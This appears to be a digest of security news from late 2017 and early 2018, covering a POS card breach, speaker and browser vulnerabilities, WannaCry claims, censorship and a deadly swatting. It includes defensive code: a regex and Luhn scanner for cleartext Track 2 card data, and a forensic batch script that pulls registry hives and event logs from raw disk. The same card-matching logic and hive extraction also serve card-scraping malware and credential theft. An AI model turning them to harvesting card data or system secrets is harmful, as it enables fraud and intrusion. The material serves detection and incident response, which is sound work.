“When encryption was off, payment card data was being stored in this log. In a group of stores that were involved in this incident, malware was installed on the log devices that was capable of finding payment card data from the logs, so if encryption was off on a POS device prior to April 3, 2017, and that data was still present in the log file at one of these stores, the malware could have found that data.”

The company advised customers who shopped at its locations to monitor their credit transactions for any suspicious activity.
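The Forever 21 statement above describes the failure mode exactly: when point-to-point encryption was off, cleartext track data was routed through the POS device and even written to the transaction log. A retailer can verify that encryption is actually on by scanning its own POS and authorization logs for Track 2 data, which is the same check a DLP tool performs. The Python below is an added example written for this page, not Forever 21's or any vendor's code; the log format is constructed, and the card numbers are public test numbers.

```python
import re

# Track 2 layout as read from the magnetic stripe: start sentinel ';', PAN (13 to 19
# digits), separator '=', expiry YYMM, 3-digit service code, discretionary data,
# end sentinel '?'. Track 1 (which carries the cardholder name) is not covered here.
TRACK2_RE = re.compile(r";(\d{13,19})=(\d{2})(\d{2})(\d{3})\d*\?")


def luhn_ok(pan):
    """Luhn checksum used by payment card numbers; filters out random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan):
    """Keep only the first six and last four digits so the report itself is not a leak."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_track2(line):
    """Return the (masked) Track 2 records found in one log line."""
    hits = []
    for m in TRACK2_RE.finditer(line):
        pan, yy, mm, service = m.groups()
        # Reject digit runs that are not cards: bad checksum or an impossible month.
        if luhn_ok(pan) and 1 <= int(mm) <= 12:
            hits.append({"pan": mask_pan(pan), "expiry": f"{mm}/{yy}", "service_code": service})
    return hits


def scan_log(lines):
    """Scan an iterable of log lines; every finding is a line where encryption was off."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        for h in find_track2(line):
            h["line"] = lineno
            findings.append(h)
    return findings


# Constructed sample of a POS authorization log (not a real device format).
# 4111111111111111 and 5500000000000004 are well-known test PANs.
SAMPLE_LOG = [
    "2017-04-03 10:15:02 AUTH ok   token=E2EE9F3C7A  amount=29.99",                    # encryption on: token only
    "2017-04-03 10:17:41 AUTH ok   track2=;4111111111111111=2512101000000000000?  amount=54.10",
    "2017-04-03 10:18:05 AUTH fail track2=;1234567890123456=2512101000000000000?",     # fails Luhn
    "2017-04-03 10:20:30 AUTH ok   track2=;5500000000000004=2513101000000000000?",     # month 13: not a card
    "2017-04-03 10:22:11 AUTH ok   track2=;5500000000000004=2406101000000000000?",
]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: cleartext track data for {f['pan']} (exp {f['expiry']}, svc {f['service_code']})")
```

Any hit is a finding in its own right: a correctly configured terminal should never emit a PAN in the clear, so a single match points at a device on which encryption was off at that time, which is exactly the per-store, per-day picture the company's investigation had to reconstruct.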


Hackers can remotely control thousands of Sonos and Bose speakers
1.1.2018 securityaffairs Hacking

Security experts at Trend Micro have demonstrated that certain models of Sonos and Bose speakers are affected by vulnerabilities that could allow attackers to hijack them.
Hackers can trigger the flaws to access the speakers and use them to play spooky sounds or to issue Alexa commands.

Only specific models of the two companies are actually affected by the issues, including the Sonos One and the Bose SoundTouch.

Attackers scan the Internet for vulnerable devices; once they find a flawed speaker, they can use its API to instruct it to play any audio file hosted at a URL of their choosing.

“The impacted models allow any device on the same network to access the APIs they use to interface with apps like Spotify or Pandora without any sort of authentication.” reads the post published by Wired. “Tapping into that API, the researchers could simply ask the speakers to play an audio file hosted at any URL they chose, and the speakers would obey.”


The experts at Trend Micro found between 2,500 and 5,000 Sonos devices and between 400 and 500 Bose devices open to audio hacking.

The attacks are more alarming in scenarios where these voice assistant devices control smart home features such as door locks, air conditioners, and lighting.

“Whereas previous studies focused on seizing control of speakers like the Amazon Echo and Google Home, the results of our case study led to unique findings. These include security gaps that resulted from a simple open port that gave anyone on the internet access to the device and user information.” reads the post published by Trend Micro. “The first glaring finding was access to email addresses that are linked to music streaming services synced with the device. Another was access to a list of devices as well as shared folders that were on the same network as the test device.”

In testing devices running an older version of Sonos software, the researchers demonstrated that they leak detailed information, like the IP addresses and device IDs of gadgets that had connected to the speakers.

Attacks of the kind theorized by Trend Micro have already been reported in the wild: one Sonos customer earlier this year reported that her speaker started playing strange sounds.

Trend Micro shared its findings with Sonos, which quickly fixed the issues, including a denial-of-service (DoS) bug, while Bose has not yet replied.

The full report, including the attack scenarios, is available at the following link:

The Sound of a Targeted Attack.


Happy IR in the New Year!
1.1.2018 Kaspersky APT
At the end of last year Mr. Jake Williams (aka @MalwareJake) asked a very important question on Twitter about the lack of visibility when detecting APT intrusions. The results show that endpoint analysis is the most important part of any research connected with APTs. Endpoint forensics is also critical during any Incident Response (IR), because in many cases the initial intrusion happened so long ago that there are no relevant logs and no backups left to identify the first victim and the way the attackers moved from one computer to another. At least once a year we run into this during IR activities with our customers. In these cases we use a very simple script that is uploaded to every Windows computer in the corporate network to collect logs, NTFS data, entries from the Windows registry and strings from the binary files, in order to find out exactly how the attackers were moving through the network. It’s holiday season and it is our pleasure to share this script with you. We hope it will help save a lot of time during IR and any malware/APT investigation by providing the much-needed visibility into potentially infected endpoint PCs.

Let’s start by collecting the file system information from the computer using the wonderful forensics tool FLS (administrative privileges required) from the open source package Sleuthkit. The only thing the official Windows build lacks is Windows XP/2003 support. If you are planning to run the tool on Windows XP/2003 machines, you may need to recompile FLS from source using MinGW or download our pre-compiled version (see the end of this blog post). We also do not want to write the results to the computer’s hard drive, to avoid wiping its unallocated space. So the tool is going to use a large share folder (approx. 300 MB of free space per corporate computer) that should be prepared in advance and be accessible from every computer in the network that will execute the script:

::Map the prepared share and create one report folder per computer
set data_share="\\corp_share\data_share"
net use y: %data_share%
mkdir y:\%COMPUTERNAME%_report
set dp=y:\%COMPUTERNAME%_report
echo %date% %time% %COMPUTERNAME% > %dp%\report.log
::Full recursive listing of the system drive with inode (MFT entry) numbers and timestamps
fls.exe -lpr \\.\c: >> %dp%\fls.log

It will take several (dozens of) minutes to create the full list of filesystem entries for the computer’s system drive. After that we are ready to extract the inode numbers of the Windows registry files that are interesting to us. We will use the ICAT tool from the same Sleuthkit package and the RegLookup utility to grab the modification timestamp of every Windows registry key. At the end we want to collect all the strings from the registry files (using either the tool by Mr. Mark Russinovich or the strings tool described at http://pubs.opengroup.org/onlinepubs/9699919799/utilities/strings.html, which is our choice) to search for any data from the unallocated space and deleted keys:

::Get Windows reg files: find the inode of each hive in the fls listing (entries containing "profile" or "log" are excluded) and copy it out with icat
::"cut" is a Unix-style cut utility that must be on the PATH
findstr /i "windows\/system32\/config\/system " %dp%\fls.log | findstr /vi "profile" | findstr /vi log | cut -f2 -d" " | cut -f1 -d":" > %dp%\system.reg.inode
for /f "tokens=1" %%a in (%dp%\system.reg.inode) do icat \\.\c: %%a > %dp%\system.reg
findstr /i "windows\/system32\/config\/software " %dp%\fls.log | findstr /vi "profile" | findstr /vi log | cut -f2 -d" " | cut -f1 -d":" > %dp%\software.reg.inode
for /f "tokens=1" %%a in (%dp%\software.reg.inode) do icat \\.\c: %%a > %dp%\software.reg
::Convert reg files: RegLookup lists every key with its modification timestamp
reglookup.exe %dp%\system.reg > %dp%\system.reg.log
reglookup.exe %dp%\software.reg > %dp%\software.reg.log
::Get strings from reg files (-e l and -e b select 16-bit little- and big-endian encodings; this also picks up deleted keys and slack)
strings -afel %dp%\system.reg > %dp%\system.str.log
strings -afeb %dp%\system.reg >> %dp%\system.str.log
strings -afel %dp%\software.reg > %dp%\software.str.log
strings -afeb %dp%\software.reg >> %dp%\software.str.log

Once finished, we are ready to do the same with the Windows system and security event log files. To parse the log files we will use the open source tools evtxexport and evtexport by Mr. Joachim Metz:

::Get Logs: Vista and later store event logs as .evtx under winevt\logs
findstr /i "windows\/system32\/winevt\/logs\/system.evtx" %dp%\fls.log | cut -f2 -d" " | cut -f1 -d":" > %dp%\system.evtx.inode
for /f "tokens=1" %%a in (%dp%\system.evtx.inode) do icat \\.\c: %%a > %dp%\system.evtx
findstr /i "windows\/system32\/winevt\/logs\/security.evtx" %dp%\fls.log | cut -f2 -d" " | cut -f1 -d":" > %dp%\security.evtx.inode
for /f "tokens=1" %%a in (%dp%\security.evtx.inode) do icat \\.\c: %%a > %dp%\security.evtx
strings -afeb %dp%\system.evtx > %dp%\system.evtx.str.log
strings -afel %dp%\system.evtx >> %dp%\system.evtx.str.log
strings -afeb %dp%\security.evtx > %dp%\security.evtx.str.log
strings -afel %dp%\security.evtx >> %dp%\security.evtx.str.log
::Conv evtx
evtxexport.exe %dp%\system.evtx > %dp%\system.evtx.res.log
::get evt logs: XP/2003 keep the legacy .Evt format under system32\config
findstr /i "windows\/system32\/config\/SysEvent.Evt" %dp%\fls.log | cut -f2 -d" " | cut -f1 -d":" > %dp%\SysEvent.Evt.inode
for /f "tokens=1" %%a in (%dp%\SysEvent.Evt.inode) do icat \\.\c: %%a > %dp%\SysEvent.Evt
findstr /i "windows\/system32\/config\/SecEvent.Evt" %dp%\fls.log | cut -f2 -d" " | cut -f1 -d":" > %dp%\SecEvent.Evt.inode
for /f "tokens=1" %%a in (%dp%\SecEvent.Evt.inode) do icat \\.\c: %%a > %dp%\SecEvent.Evt
::get strings from evt
strings -afeb %dp%\SysEvent.Evt > %dp%\SysEvent.Evt.str.log
strings -afel %dp%\SysEvent.Evt >> %dp%\SysEvent.Evt.str.log
strings -afeb %dp%\SecEvent.Evt > %dp%\SecEvent.Evt.str.log
strings -afel %dp%\SecEvent.Evt >> %dp%\SecEvent.Evt.str.log
::Conv evt
evtexport.exe %dp%\SysEvent.Evt > %dp%\SysEvent.Evt.res.log

Actually, this is it. All logs will be collected in our share folder, so we can search them for anything interesting. In the latest cases involving Carbanak we were looking for mentions of the malicious PowerShell scripts, so let’s add the following line to our version of the script:

findstr /i "powershell" %dp%\*.log >> %dp%\report.log

This will provide us with a complete picture of how the attackers were moving from one computer to another with exact timestamps and artifacts on NTFS, registry and logs that is critical for fast and effective IR with no lack of endpoint visibility. GLHF and HAPPY IR in NEW YEAR!
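Once every computer has dropped its `<COMPUTERNAME>_report` folder on the share, the findstr step above still has to be repeated per host and the hits ordered by hand. The Python below is an added example, not part of Kaspersky's script: it generalizes that step to several indicators at once, pulls the timestamp out of matching fls and RegLookup lines, orders hits across hosts, and reports the earliest dated hit per host (the "first victim" question the post opens with). The sample reports, host names, paths and times are constructed; their line shapes only approximate the real tools' output, and lines without a recognizable timestamp (typically the strings dumps) are kept but sorted last.

```python
import re
from pathlib import Path

# Timestamps in the form printed by fls -l and RegLookup (YYYY-MM-DD HH:MM:SS).
TS_RE = re.compile(r"\d{4}-\d{2}-\d{2}[ T]\d{2}:\d{2}:\d{2}")


def load_share(share_dir):
    """Read every <COMPUTERNAME>_report folder on the share: {host: {filename: text}}."""
    reports = {}
    for folder in Path(share_dir).glob("*_report"):
        host = folder.name[: -len("_report")]
        reports[host] = {p.name: p.read_text(errors="replace") for p in folder.glob("*.log")}
    return reports


def find_hits(reports, keywords):
    """Case-insensitive substring search over all collected logs (the findstr step,
    but for several indicators at once and with the host recorded per hit)."""
    pats = [k.lower() for k in keywords]
    hits = []
    for host, files in reports.items():
        for fname, text in files.items():
            for lineno, line in enumerate(text.splitlines(), 1):
                low = line.lower()
                if any(p in low for p in pats):
                    m = TS_RE.search(line)
                    hits.append({"host": host, "file": fname, "line": lineno,
                                 "timestamp": m.group(0) if m else None,
                                 "text": line.strip()})
    return hits


def timeline(hits):
    """Order hits across hosts; undated lines sort last so they do not distort the picture."""
    return sorted(hits, key=lambda h: (h["timestamp"] is None, h["timestamp"] or "", h["host"]))


def first_seen(hits):
    """Earliest dated hit per host, oldest host first: candidates for the first victim
    and the order in which the attackers reached the other machines."""
    first = {}
    for h in hits:
        ts = h["timestamp"]
        if ts and (h["host"] not in first or ts < first[h["host"]]):
            first[h["host"]] = ts
    return dict(sorted(first.items(), key=lambda kv: kv[1]))


# Constructed sample: two hosts with a few lines shaped like fls -l output,
# RegLookup CSV and a strings dump. Everything here is invented for the example.
SAMPLE_REPORTS = {
    "WS-017": {
        "fls.log": (
            "r/r 91234-128-1:\tUsers/jdoe/AppData/Local/Temp/update.ps1\t"
            "2017-12-21 09:12:44 (UTC)\t2017-12-21 09:12:44 (UTC)\t2048\t0\t0\n"
            "r/r 3-128-1:\tWindows/System32/config/SYSTEM\t2017-12-29 07:00:01 (UTC)\t0\t0\n"
        ),
        "system.reg.log": (
            "PATH,TYPE,VALUE,MTIME\n"
            "/ControlSet001/Services/UpdSvc,KEY,,2017-12-21 09:13:02\n"
            "/ControlSet001/Services/UpdSvc/ImagePath,SZ,"
            "powershell.exe -File C:\\Users\\jdoe\\AppData\\Local\\Temp\\update.ps1,\n"
        ),
        "system.evtx.str.log": "svchost.exe\npowershell.exe\n",
    },
    "WS-042": {
        "fls.log": "r/r 45011-128-1:\tWindows/Temp/update.ps1\t2017-12-20 18:40:10 (UTC)\t1024\t0\t0\n",
        "system.reg.log": "PATH,TYPE,VALUE,MTIME\n",
    },
}


if __name__ == "__main__":
    hits = find_hits(SAMPLE_REPORTS, ["powershell", "update.ps1"])
    for h in timeline(hits):
        print(f"{h['timestamp'] or '(no timestamp)':19}  {h['host']:8}  {h['file']}:{h['line']}  {h['text'][:70]}")
    print("first seen per host:", first_seen(hits))
```

Against a real share, `find_hits(load_share(r"y:\"), [...])` replaces the constructed dictionary; the indicator list would hold whatever the current case turned up (script names, service names, hostnames the attackers used), and the earliest entry of `first_seen` is where the deeper disk forensics starts.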

PS. LINK 2 FILE

SHA256 (HappyNewYear.zip) = c166d1e150db24ea27014e1d4a9eeb79f9e317ded9918a623fee8e66a010f9fa


Vietnam's 10,000-strong 'Cyber Army' Slammed by Rights Groups
1.1.2018 securityweek BigBrothers
The deployment of 10,000 cyber warriors to fight online dissent in Vietnam adds a grim "new dimension" to controls on free speech in the Communist country, a rights group has said.

Vietnam routinely jails its critics and closely monitors activists on social media, which, unlike in neighbouring China, is not banned.

A top Vietnamese general this week said a 10,000-strong brigade dubbed "Force 47" has been tasked with fighting "wrongful views" spreading on the internet, according to state media reports.

It was not immediately clear what Force 47 is responsible for, but observers anticipate the cyber soldiers will escalate smear campaigns against activists online.

Rights groups rounded on the move.

Human Rights Watch deputy Asia director Phil Robertson said the cyber scouts announcement was a "shocking new dimension to Vietnam's crackdown on dissent".

Others said the tactic is designed to squeeze online critics.

"This is just the latest plank in a campaign to curb internet freedoms at all costs," Shawn Crispin, Committee to Protect Journalists' Southeast Asia representative, told AFP Friday.

"While they can't unplug Facebook, Instagram and the likes outright, they can apply more and more pressure on those platforms and it looks like these cyber troops are their latest attempt to do that."

Vietnam's internet is classified as "not free", according to web watchdog Freedom House, which ranks it second only to China in Asia.

Around half of the country's 93 million people have access to the internet, and the country also ranks among Facebook's top 10 users by numbers.

Vietnamese officials did not respond to a request for comment from AFP.

Earlier this year the government asked Facebook and YouTube to remove "toxic content" from its sites.

In August, the president called for tougher internet controls, saying that groups have used the web to launch campaigns against the government that threaten the "prestige of the party's leaders and the state".

A conservative leadership in power since last year has waged a crackdown on dissidents, with at least 15 arrested this year, according to Amnesty International.

Several others have been handed heavy jail terms, joining scores of activists already behind bars.

Force 47 is likely to include commentators hired to publish pro-government material and counter critics, said Madeline Earp, senior research analyst with Freedom House.

"Vietnam very much follows China's example when suppressing internet freedom, particularly when it comes to blocking websites and arresting dissidents," she told AFP.

For some activists, the cyber troop announcement is no surprise. But activist Nguyen Chi Tuyen said the new force marked an escalation in state tactics of repression.

"The main purpose for Force 47 is to try and control news and public opinion on the internet... they want to protect the party, not protect the country," said Tuyen, more commonly known by his online handle Anh Chi.


WeChat is set to become China’s official electronic ID system
1.1.2018 securityaffairs Mobil

China’s largest social media network, WeChat, is set to become an official electronic ID system in the country; an ID pilot program has been launched in Guangzhou’s Nansha District.
WeChat (‘Weixin’ in China) is China’s largest social media network, according to Tencent Holdings, the platform had 980 million monthly active users as of late September.

A project launched by the government of Beijing could use WeChat as the official electronic personal identification system.

A WeChat ID pilot program was launched in Guangzhou’s Nansha District, where citizens will soon be able to identify themselves through the social network. According to Xinhua, over 30,000 people applied for ID cards in the 24 hours following the launch of the project.

The WeChat ID could be used to authenticate citizens to online and offline government services, it will also give them access to many other online services such as hotel registration and ticketing.

Anonymity on WeChat is not possible: China has phased in a real-name registration requirement for mobile phone numbers since 2013, and every account is associated with a mobile phone number.

The ID programme was developed by the research institute of the Ministry of Public Security in collaboration with Tencent’s WeChat team. Several banks in the country and many government departments have provided their support to the project.

The project aims to deter online identity theft; the system relies on facial recognition technology to verify applicants before their virtual ID cards are authorized.

The ID cards are available in a “lightweight” format, which provides simple proof of identity when accessing services, and an “upgraded” format, where more information is requested, for example when registering a business.

Privacy advocates have raised concerns about the program because this public-private partnership could allow the Government to intensify its extensive surveillance and censorship activities.


A new Facebook security feature reveals fraudulent Facebook-like mails
1.1.2018 securityaffairs
Social

A new Facebook security feature protects users from identity theft: the tech giant is keeping a record of every email it has “recently” sent to its users.
Facebook has rolled out a new security feature to protect users from identity theft; the tech giant is keeping a record of every email it has “recently” sent to its users.

The full list of emails sent by Facebook is available under the Settings menu on the social network platform.

Facebook users that will receive a message allegedly sent by the social network giant can check its authenticity by viewing the new “See recent emails from Facebook” section at the bottom of the Security and Login page.


If the message is not included in the list, it is fraudulent and should be discarded.

“Facebookmail.com is a common domain that Facebook uses to send notifications when we detect an attempt to log in to your account or change a password. If you’re unsure if an email you received was from Facebook, you can check its legitimacy by visiting facebook.com/settings to view a list of security-related emails that have been recently sent.” states the announcement published by Facebook.

Even if threat actors are able to disguise emails, to make them look like official messages sent by Facebook, the new Facebook security feature will help users to identify phishing attacks.

Crooks use phishing attacks to obtain victims’ credentials, access their profiles, and perform a wide range of fraudulent activities.

Compromised accounts could be used to send out phishing messages or to spread malware.

Users who discover a scam email pretending to come from the Facebook platform can report it to phish@facebook.com.

If your account has been compromised due to a phishing attempt, visit facebook.com/hacked.

“If you’ve checked this tool and determined that an email you received is fake, we encourage you to report it to phish@facebook.com, and if you believe your account has been compromised due to a phishing attempt, you may attempt to regain access to your account at: facebook.com/hacked. ” concludes Facebook.


Critical "Same Origin Policy" Bypass Flaw Found in Samsung Android Browser
30.12.2017 thehackernews Android

A critical vulnerability has been discovered in the browser app that comes pre-installed on hundreds of millions of Samsung Android devices; it could allow an attacker to steal data from other browser tabs if the user visits an attacker-controlled site.
Identified as CVE-2017-17692, the vulnerability is a Same Origin Policy (SOP) bypass issue that resides in the popular Samsung Internet Browser version 5.4.02.3 and earlier.
The Same Origin Policy or SOP is a security feature applied in modern browsers that is designed to make it possible for web pages from the same website to interact while preventing unrelated sites from interfering with each other.
In other words, the SOP makes sure that the JavaScript code from one origin should not be able to access the properties of a website on another origin.

The SOP bypass vulnerability in the Samsung Internet Browser, discovered by Dhiraj Mishra, could allow a malicious website to steal data, such as passwords or cookies, from the sites opened by the victim in different tabs.
"When the Samsung Internet browser opens a new tab in a given domain (say, google.com) through a Javascript action, that Javascript can come in after the fact and rewrite the contents of that page with whatever it wants," researchers from security firm Rapid7 explained.
"This is a no-no in browser design since it means that Javascript can violate the Same-Origin Policy, and can direct Javascript actions from one site (controlled by the attacker) to act in the context of another site (the one the attacker is interested in). Essentially, the attacker can insert custom Javascript into any domain, provided the victim user visits the attacker-controlled web page first."
Attackers can even snag a copy of your session cookie or hijack your session and read and write webmail on your behalf.
Mishra reported the vulnerability to Samsung, and the company replied that "the patch is already preloaded in our upcoming model Galaxy Note 8, and the application will be updated via Apps store update in October."
Meanwhile, Mishra, with the help of Tod Beardsley and Jeffrey Martin from Rapid7 team, also released an exploit for Metasploit Framework.
Rapid7 researchers have also published a video demonstrating the attack.
Since the Metasploit exploit code for the SOP bypass vulnerability in the Samsung Internet Browser is now publicly available, even attackers with little technical knowledge can exploit the flaw on a large number of Samsung devices, most of which are still using the old stock Android browser.


CEO of Major UK-Based Cryptocurrency Exchange Kidnapped in Ukraine
30.12.2017 thehackernews Cyber

Pavel Lerner, a prominent Russian blockchain expert and managing director of the major crypto-exchange EXMO, has allegedly been kidnapped by "unknown" criminals in the Ukrainian capital of Kiev.
According to Ukraine-based web publication Strana, Lerner, a 40-year-old citizen of Russia, was kidnapped on December 26 as he was leaving his office in the center of town (located on Stepan Bandera Avenue).
Unknown kidnappers in dark clothes and balaclavas dragged Lerner into their black Mercedes-Benz Vito (licence plate AA 2063 MT) and drove away in an unknown direction.
The information comes from an anonymous source in Ukrainian law enforcement agencies, though multiple investigations are currently underway to find out why and by whom Lerner was kidnapped.
Lerner is a recognized IT specialist in Ukraine who led a number of startups related to blockchain technology development and mining operations.
Lerner is also the managing director of EXMO, a major UK-based cryptocurrency exchange founded in 2013 and well-known with Russians for accepting ruble payments.
Law enforcers in Kiev have begun an investigation and are currently conducting a search operation, working through all possible leads in the case, which is being treated as a kidnapping.
EXMO's representatives confirmed the media reports in a statement to the local crypto journal BitNovosti and appealed for any information that could help locate Lerner.
The company representatives also assured its customers that EXMO operations were not affected by the incident and that Lerner did not have direct access to any cryptocurrency account or other personal data.
"We are doing everything possible to speed up the search of Pavel Lerner. Any information regarding his whereabouts is very much appreciated," PR-department of EXMO said.
"Despite the situation, the exchange is working as usual. We also want to stress that nature of Pavel’s job at EXMO doesn’t assume access either to storages or any personal data of users. All users funds are absolutely safe."
Lerner's case is yet another case involving a Russian national with a cryptocurrency background.
In July this year, Alexander Vinnik, a 38-year-old Russian citizen and operator of the cryptocurrency exchange BTC-e, was detained in Northern Greece at the request of US law enforcement authorities. A Greek court ruled in October to extradite Vinnik to the United States.
The US authorities accused Vinnik of crimes related to the hack of Mt. Gox, which was shut down in 2014 following a massive series of mysterious robberies, which totaled at least $375 million in Bitcoin.


Two Romanians Charged With Hacking Police CCTV Cameras Before Trump Inauguration
30.12.2017 thehackernews Crime

Remember how some cybercriminals shut down most of Washington D.C. police's security cameras for four days ahead of President Donald Trump's inauguration earlier this year?
Just a few days after the incident, British authorities arrested two people in the United Kingdom, identified as a British man and a Swedish woman, both 50 years old, at the request of U.S. officials.
But now a US federal court affidavit has revealed that two Romanian nationals were behind the attack that hacked into 70% of the computers that control the Washington DC Metropolitan Police Department's surveillance camera network in January this year, CNN reports.
The two suspects—Mihai Alexandru Isvanca, 25, and Eveline Cismaru, 28—were arrested in Bucharest on December 15 on charges of conspiracy to commit wire fraud and various forms of computer fraud.
According to the criminal complaint unsealed in Washington, the pair hacked 123 of the Metropolitan Police Department's 187 outdoor surveillance cameras used to monitor public areas in D.C. by infecting computers with ransomware in an effort to extort money.
Ransomware is an infamous piece of malicious software that has been known for locking up computer files and then demanding a ransom (usually in Bitcoins) to help victims unlock their files.
The cyber attack occurred just days before the inauguration of President Donald Trump and lasted for almost four days, leaving the CCTV cameras unable to record anything between 12 and 15 January 2017.
Instead of fulfilling ransom demands, the DC police department took the storage devices offline, removed the infection and rebooted the systems across the city, ensuring that the surveillance camera system was secure and fully operational.
"This case was of the highest priority due to its impact on the Secret Service’s protective mission and its potential effect on the security plan for the 2017 Presidential Inauguration," the Justice Department said.
"The investigation revealed no evidence that any person’s physical security was threatened or harmed due to the disruption of the MPD surveillance cameras."
The affidavit, dated December 11, mentions the defendants used two types of cryptocurrency ransomware variants—Cerber and Dharma. Other evidence also revealed a scheme to distribute ransomware by email to at least 179,000 email addresses.
"According to the complaint, further investigation showed that the two defendants, Isvanca and Cismaru, participated in the ransomware scheme using the compromised MPD surveillance camera computers, among others," the Justice Department said.
"The investigation also identified certain victims who had received the ransomware or whose servers had been accessed during the scheme."
However, it is still unclear whether the arrested pair were solely behind the attack or were part of a more comprehensive cybercriminal network.
While Isvanca remains in custody in Romania, Cismaru is under house arrest pending further legal proceedings, according to the Justice Department.
If extradited and convicted, the Romanian defendants could face a maximum of 20 years in prison.


It’s a mystery, member of the Lurk gang admits creation of WannaCry ransomware for intelligence agencies
30.12.2017 securityaffairs Ransomware

A hacker belonging to the Lurk cybercrime gang admits to creating the WannaCry ransomware and carrying out the DNC hack at the request of intelligence agencies.
In an interview with the Dozhd TV channel, Konstantin Kozlovsky, one of the members of the Lurk crime group arrested in the Russian city of Ekaterinburg, said that he was one of the authors of the dreaded WannaCry ransomware and that the job was commissioned by intelligence agencies.


The Lurk cybercrime gang was known in the criminal ecosystem because it developed, maintained and rented out the infamous Angler Exploit Kit. A joint investigation conducted by the Russian Police and Kaspersky Lab allowed the identification of the individuals behind the Lurk malware. The members of the Lurk cybercrime crew were arrested by Russian law enforcement in the summer of 2016.

Law enforcement arrested the suspects in June; authorities accused them of stealing around $45 million USD from Russian financial institutions by using the Lurk banking trojan.

According to Cisco Talos researchers, after the arrests of the individuals behind the Lurk banking trojan, the Angler EK rapidly disappeared from the wild.

According to Kozlovsky, WannaCry was developed to target corporate networks and spread rapidly by infecting as many machines as possible. The intent was to paralyze the activities of the target organization with just ‘one button.’

“The virus was tested on computers of the Samolet Development company which is engaged in construction of housing in Moscow area. Also hackers planned to hack a network of Novolipetsk Steel and to try to stop its blast furnaces.” reported the Russian Website crimerussia.com.

Konstantin Kozlovsky, who is now being held in a pre-trial detention center, has already admitted to having worked for intelligence agencies.

Earlier, the hacker claimed that he had breached servers of the Democratic Party of the USA and the e-mail of Hillary Clinton for the Russian intelligence agency FSB.

Kozlovsky explained that the actions were coordinated by Dmitry Dokuchaev from the Center of Information Security of the FSB. Dmitry Dokuchaev is one of the two Russian intelligence officers (Dmitry Dokuchaev and Igor Sushchin) charged in March by the US Justice Department along with hackers Alexsey Belan and Karim Baratov for breaking into Yahoo servers in 2014.

Dokuchaev through his lawyer denied knowing Kozlovsky.

Kozlovsky’s story is quite strange: he is currently in the custody of Russian authorities and nevertheless continues to accuse the FSB of other hacks as well. Is this a new disinformation campaign? Who is orchestrating it, and why?

In December, the US Government attributed the massive WannaCry attack to North Korea.

The news of the attribution was first reported by The Wall Street Journal; according to the US Government, the WannaCry attack that infected millions of computers worldwide in May was an act of information warfare.

WannaCry infected 200,000 computers across 150 countries in a matter of hours. It took advantage of a tool named “Eternal Blue”, originally created by the NSA, which exploited a vulnerability present in earlier versions of Microsoft Windows. This tool was stolen by a hacking group named “Shadow Brokers”, which leaked it to the world in April 2017.


WannaCry ransomware on a Bayer radiology system – Source Forbes


Chinese censorship – authorities have shut down 13,000 websites since 2015
30.12.2017 securityaffairs BigBrothers

China continues to strengthen its online censorship; it has shut down or revoked the licenses of 13,000 websites since 2015 for violating the country’s internet rules.
State media also reported that service providers have closed nearly 10 million internet accounts for “violating service protocol.”

“These moves have a powerful deterrent effect,” Xinhua quoted Wang Shengjun, vice chairman of the Standing Committee of the National People’s Congress (NPC), as saying.

Chinese authorities have summoned more than 2,200 website operators since 2015. According to Xinhua, more than 10 million people who refused to register using their real names have had internet or other telecoms accounts suspended over the past five years.

Within China, websites must register with authorities and are responsible for “ensuring the legality of any information” that is published on them.

These figures confirm the strict control China exerts over the digital lives of its citizens.

According to Freedom House, China is the country with the most restrictive online use policies.


The new Chinese cyber security law gives more power to the Government and enforces new rules especially for those companies that produce software that could be used to circumvent the country’s censorship.

The Great Firewall project already blocks access to hundreds of the world’s top 1,000 websites, including Google, Facebook, Twitter, and Dropbox.

Recently the Chinese authorities sentenced a man to five-and-a-half years in prison for selling a VPN service without authorization.

Since early this year, the Chinese authorities have been banning “unauthorized” VPN services; any company offering such a service in the country must obtain an appropriate license from the government.

People living in the country use VPN and proxy services to bypass the censorship implemented by the Great Firewall and access websites prohibited by the Government without revealing their actual identity.


A 28-year-old Kansas man was shot and killed by police in a swatting attack
30.12.2017 securityaffairs Hacking

Andrew Finch, a 28-year-old man from Wichita, Kansas, was killed last week in a swatting attack by police who were responding to a call reporting a hostage situation at the man’s house.
It all began on the evening of December 28, when two Call of Duty gamers, arguing over a wager, threatened to ‘swat’ each other, but one of them gave a nearby known swatter the wrong address.

“The two CoD players reportedly got into an argument over a small money loss on UMG’s wager platform online (view match) and threatened to swat each other, with one of the players sending the other incorrect details of an address nearby to a known swatter, who was reportedly responsible for the CWL Dallas bomb hoax evacuations.” reported the website Dexerto.

Christopher Duarte (@Parasite), 5:29 AM - Dec 29, 2017:
"Unbelievable, two kids in the community got in a verbal dispute and thought it would be funny to swat each other which resulted in an innocent man being killed by police officers responding to the swat calling. Disgusted."
http://www.kansas.com/news/local/crime/article192081124.html

Yes, you heard right, the absurd death was the result of a “swatting” attack gone wrong.

According to the popular expert Brian Krebs, the dispute played out on Twitter, where one of the parties, allegedly using the Twitter handle “SWauTistic”, threatened to swat another user with the handle “7aLeNT”. @7aLeNT dared someone to swat him, but then tweeted an address that was not his own.

“Swautistic responded by falsely reporting to the Kansas police a domestic dispute at the address 7aLenT posted, telling the authorities that one person had already been murdered there and that several family members were being held hostage.” wrote Krebs.

“Not long after that, Swautistic was back on Twitter saying he could see on television that the police had fallen for his swatting attack. When it became apparent that a man had been killed as a result of the swatting, Swautistic tweeted that he didn’t get anyone killed because he didn’t pull the trigger (see image above).

Swautistic soon changed his Twitter handle to @GoredTutor36, but KrebsOnSecurity managed to obtain several weeks’ worth of tweets from Swautistic before his account was renamed. Those tweets indicate that Swautistic is a serial swatter — meaning he has claimed responsibility for a number of other recent false reports to the police.”


“I heard my son scream, I got up, and then I heard a shot,” said Lisa Finch, the mother of the shooting victim, in a video interview with the Wichita Eagle.

Police then handcuffed Lisa Finch and took her outside, along with “my roommate and my granddaughter, who witnessed the shooting and had to step over her dying uncle’s body.”

Andrew was unarmed and the police did not find any weapon in the house.

A typical “swatting” scenario sees someone call the police, pretending to be at the target’s home, and describe a fake emergency that demands an armed law enforcement response. This is what happened at the Finch house.

“We were told that someone had an argument with their mother, and dad was accidentally shot and that now that person was holding brother, sister, and mother hostage,” a police official told reporters.

